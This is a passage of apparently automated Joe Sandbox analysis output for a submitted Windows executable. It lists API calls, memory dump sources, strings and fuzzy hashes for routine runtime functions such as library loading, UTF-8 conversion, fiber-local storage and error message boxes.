                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7FBDCE06A,?,?,?,00007FF7FBDCDD5C,?,?,00000001,00007FF7FBDCD979), ref: 00007FF7FBDCDE75
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7FBDCE06A,?,?,?,00007FF7FBDCDD5C,?,?,00000001,00007FF7FBDCD979), ref: 00007FF7FBDCDEBB
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF7FBDCE06A,?,?,?,00007FF7FBDCDD5C,?,?,00000001,00007FF7FBDCD979), ref: 00007FF7FBDCDEC7
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                          • Opcode ID: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
                                                                                                                                                                                                                                                                          • Instruction ID: e6745f6a6d8f5f1648c65273cc0479e6477fcdebf58cb02309fbd03e43edc6d7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F931C361B1AA4385EF5AFB0A9840575A398BF58B60F9A0535DD7D063E0DF3CE44083E2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7FBDC2ABB), ref: 00007FF7FBDC8B1A
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7FBDC87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDC101D), ref: 00007FF7FBDC2A14
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC29E0: MessageBoxW.USER32 ref: 00007FF7FBDC2AF0
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7FBDC2ABB), ref: 00007FF7FBDC8BA0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                                          • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                                                                          • API String ID: 3723044601-876015163
                                                                                                                                                                                                                                                                          • Opcode ID: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
                                                                                                                                                                                                                                                                          • Instruction ID: 69645a9d8b9e031cc20695e83b19a5b6fa6a23f070413932e80c976975308174
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53219362B08A4381EB18EB2DF840079E361FB847D4F884231DB6C43BB9EF2CD5418791
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3f41bd99dd68f3966606bc7d550af5f0edca5de962d3041767b0314e9ea66860
                                                                                                                                                                                                                                                                          • Instruction ID: 3d4916649551ae497450f87608ef3a1eab61980168e54e7626a531e10bea528d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f41bd99dd68f3966606bc7d550af5f0edca5de962d3041767b0314e9ea66860
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42216D28A0E74342FB5D77399655139E2425F487B4FD04734E9BD066F6DE2CB40147A3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                          • Opcode ID: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
                                                                                                                                                                                                                                                                          • Instruction ID: 84de241069bf84c5e1e83bfb5cf9787e2c6d10fbcf32ac52ecc2e55962948909
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9118735618A8386E7589B8AE854325F6A0FB88BE4F840234E93D477F4CF3CE4448792
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7FBDD54CD,?,?,?,?,00007FF7FBDDF1BF,?,?,00000000,00007FF7FBDDB9A6,?,?,?), ref: 00007FF7FBDDB897
                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7FBDD54CD,?,?,?,?,00007FF7FBDDF1BF,?,?,00000000,00007FF7FBDDB9A6,?,?,?), ref: 00007FF7FBDDB8CD
                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7FBDD54CD,?,?,?,?,00007FF7FBDDF1BF,?,?,00000000,00007FF7FBDDB9A6,?,?,?), ref: 00007FF7FBDDB8FA
                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7FBDD54CD,?,?,?,?,00007FF7FBDDF1BF,?,?,00000000,00007FF7FBDDB9A6,?,?,?), ref: 00007FF7FBDDB90B
                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7FBDD54CD,?,?,?,?,00007FF7FBDDF1BF,?,?,00000000,00007FF7FBDDB9A6,?,?,?), ref: 00007FF7FBDDB91C
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF7FBDD54CD,?,?,?,?,00007FF7FBDDF1BF,?,?,00000000,00007FF7FBDDB9A6,?,?,?), ref: 00007FF7FBDDB937
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                          • Opcode ID: 154d6b1ff44e9056db56d396687895a785f43ec8102cc5bf305a249fc10f374f
                                                                                                                                                                                                                                                                          • Instruction ID: 2bfeb6b8449a5a84a40f0c3d367e5eed2c7919226a1b7ece35c47f29d0c794e4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 154d6b1ff44e9056db56d396687895a785f43ec8102cc5bf305a249fc10f374f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA114C24B0E64342F75C7739954563DA2525F8C7B4FC44734E8BE466EADE2CB40147A2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm$f
                                                                                                                                                                                                                                                                          • API String ID: 2395640692-629598281
                                                                                                                                                                                                                                                                          • Opcode ID: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
                                                                                                                                                                                                                                                                          • Instruction ID: 88bcb47affa17c5b51c8095b4d859d6bcde45fd9b18a2f872fdd069b7c71bbf9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D951E476B196038AD71CEF19E804A29B7A5FB44B94F908130DA6E037D8DF38E841C7E5
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                          • Opcode ID: ef2f79dabe8b940bf64869f24e404b0ac86445532df2e67e8084f44f9f65f5c2
                                                                                                                                                                                                                                                                          • Instruction ID: 6dd5fab41bb514cfd65589ed8fb1059fdde38ef3e0b08e1c979500f4e9bdf0de
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef2f79dabe8b940bf64869f24e404b0ac86445532df2e67e8084f44f9f65f5c2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D231B676A09A8384EB28FF69E8911F9A360FF88784F800035EA5D47BA5DF3CD101C752
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7FBDC87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDC101D), ref: 00007FF7FBDC2A14
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC8560: GetLastError.KERNEL32(00000000,00007FF7FBDC2A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDC101D), ref: 00007FF7FBDC8587
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC8560: FormatMessageW.KERNEL32 ref: 00007FF7FBDC85B6
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7FBDC2ABB), ref: 00007FF7FBDC8B1A
                                                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF7FBDC2AF0
                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 00007FF7FBDC2B0C
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                                          • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                                          • API String ID: 2806210788-2410924014
                                                                                                                                                                                                                                                                          • Opcode ID: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
                                                                                                                                                                                                                                                                          • Instruction ID: c16e7dd1c39da59da93ea858b233eddc156067005698b77f5eda6720c5d05950
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E319672628A8381E738EB14E4416EAA364FF847C4F804036E69D43AE9DF3CD205C7D1
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                          • Opcode ID: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
                                                                                                                                                                                                                                                                          • Instruction ID: 4653c1b80a766f951440b23b5bc51d82860b9735b47cd60095f84198c595f75b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCF0AF25A09A0381EB1CAB68E8843799360AF49760FC40635D6BE461F8CF2CE084C7A2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                          • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                                                                          • Instruction ID: a869d63de6fae67373c27e890d34559cc4139247f48000b9d56c1aace06ffc52
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B911427AE19E0301F75C31ECE54637994806F95368F890634E97E063FACE7D684182B7
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF7FBDDAB67,?,?,00000000,00007FF7FBDDAE02,?,?,?,?,?,00007FF7FBDD30CC), ref: 00007FF7FBDDB96F
                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7FBDDAB67,?,?,00000000,00007FF7FBDDAE02,?,?,?,?,?,00007FF7FBDD30CC), ref: 00007FF7FBDDB98E
                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7FBDDAB67,?,?,00000000,00007FF7FBDDAE02,?,?,?,?,?,00007FF7FBDD30CC), ref: 00007FF7FBDDB9B6
                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7FBDDAB67,?,?,00000000,00007FF7FBDDAE02,?,?,?,?,?,00007FF7FBDD30CC), ref: 00007FF7FBDDB9C7
                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7FBDDAB67,?,?,00000000,00007FF7FBDDAE02,?,?,?,?,?,00007FF7FBDD30CC), ref: 00007FF7FBDDB9D8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value
